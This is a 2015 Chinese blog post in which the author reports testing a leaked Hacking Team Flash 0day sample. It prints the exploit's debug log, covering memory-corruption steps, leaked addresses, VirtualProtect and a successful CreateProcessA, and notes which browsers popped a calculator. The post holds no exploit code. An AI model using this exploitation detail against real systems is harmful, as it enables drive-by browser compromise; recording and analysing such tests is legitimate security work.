注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

终于找到一个flash 0day样本  

2015-07-13 12:44:05|  分类: 搜集 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

见:Hacking Team 新 Flash 0day分析


测试如下,以后有心情的时候再调试一下。

IE8弹出计算器
Flash: WIN 18,0,0,203 x86-32 ActiveX
OS: Windows XP 32-bit
Platform: Win32
Browser: Microsoft Internet Explorer (Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729))
===== start =====
MyClass.valueOf1()
ar[0][198] = 1
32-bit player detected
Attempt #1
MyClass.valueOf2()
ar[57].length = 0x6a
ar[57][0x62] = 0x62
v.length = 0x40000000
v address = 0x928a4d8
gc address = 0x8833000
vo address = 0x926210c
payload address = 0x8851348
VirtualProtect address = 0x7c801ad4
CreateProcessA() returns 1 (ok)
v.length = 0x62
===== end =====
终于找到一个flash 0day样本 - appall - 且行且记录
 
SE弹出计算器
终于找到一个flash 0day样本 - appall - 且行且记录
 

FireFox弹出计算器
终于找到一个flash 0day样本 - appall - 且行且记录
Chome 没弹出计算器!
终于找到一个flash 0day样本 - appall - 且行且记录
 
 
  评论这张
 
阅读(68)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017